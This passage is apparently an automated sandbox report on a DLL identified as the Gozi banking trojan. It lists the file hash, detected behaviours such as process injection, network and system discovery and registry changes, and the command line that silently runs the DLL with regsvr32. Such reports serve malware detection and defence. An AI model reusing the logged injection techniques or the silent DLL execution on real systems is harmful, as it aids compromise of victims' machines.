Analysis Overview
SHA256
7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
Threat Level: Known bad
The file de00c4750accf516704b8c0df265c24a was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Gathers system information
Runs net.exe
Enumerates processes with tasklist
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Discovers systems in the same network
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 16:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 16:03
Reported
2022-08-03 16:05
Platform
win7-20220715-en
Max time kernel
45s
Max time network
48s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1092 wrote to memory of 1644 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
Network
Files
memory/1092-54-0x000007FEFBE31000-0x000007FEFBE33000-memory.dmp
memory/1644-55-0x0000000000000000-mapping.dmp
memory/1644-56-0x0000000075481000-0x0000000075483000-memory.dmp
memory/1644-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1644-62-0x00000000000E0000-0x00000000000ED000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 16:03
Reported
2022-08-03 16:05
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
125s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3932 set thread context of 3020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 3020 set thread context of 3448 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 3720 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 4104 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 536 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 3020 set thread context of 2616 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db13e6613606261e295c366b3400b7db9497f7721833709005687624cef2c870" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000335525a752a7d801d93e8ea752a7d801d93e8ea752a7d801fdae0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000383965343338613332646639326236386261613939613762316638353365396335303136616332663432643237306463646230663232636361306435336632650000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000008fe29700380039006500340033003800610033003200640066003900320062003600380062006100610039003900610037006200310066003800350033006500390063003500300031003600610063003200660034003200640032003700300064006300640062003000660032003200630063006100300064003500330066003200650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38396534333861333264663932623638626161393961376231663835336539633530313661633266343264323730646364623066323263636130643533663265000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645d77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645d77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 4de967a852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = f1f395a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\43062c64cdc78544bd046edef55edfa8170856ee30b98e629b82464899b859a6" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = 9baac7a852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\93214ced978b1f3fa5c37bde5aa71302a07ca2e9469b370cc11bc61930803bf3" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 30ca9fa852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ea4877a652a7d801ea4877a652a7d801ea4877a652a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000646231336536363133363036323631653239356333363662333430306237646239343937663737323138333337303930303536383736323463656632633837300000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000001669a100640062003100330065003600360031003300360030003600320036003100650032003900350063003300360036006200330034003000300062003700640062003900340039003700660037003700320031003800330033003700300039003000300035003600380037003600320034006300650066003200630038003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623133653636313336303632363165323935633336366233343030623764623934393766373732313833333730393030353638373632346365663263383730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645477a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645477a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\8b1ea3dafdc11380b50b7cb71940868d9f0ca3e1578253ed3647204878806d8f" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d7a133a752a7d8011674a8a752a7d8011674a8a752a7d801678709000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000366436336336353136616531613765343065656136356461303264653136383639326562356333663162663434663937303633383538633331393865303137310000b20009000400efbe03558280035582802e000000000000000000000000000000000000000000000000007e40b900360064003600330063003600350031003600610065003100610037006500340030006500650061003600350064006100300032006400650031003600380036003900320065006200350063003300660031006200660034003400660039003700300036003300380035003800630033003100390038006500300031003700310000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e006100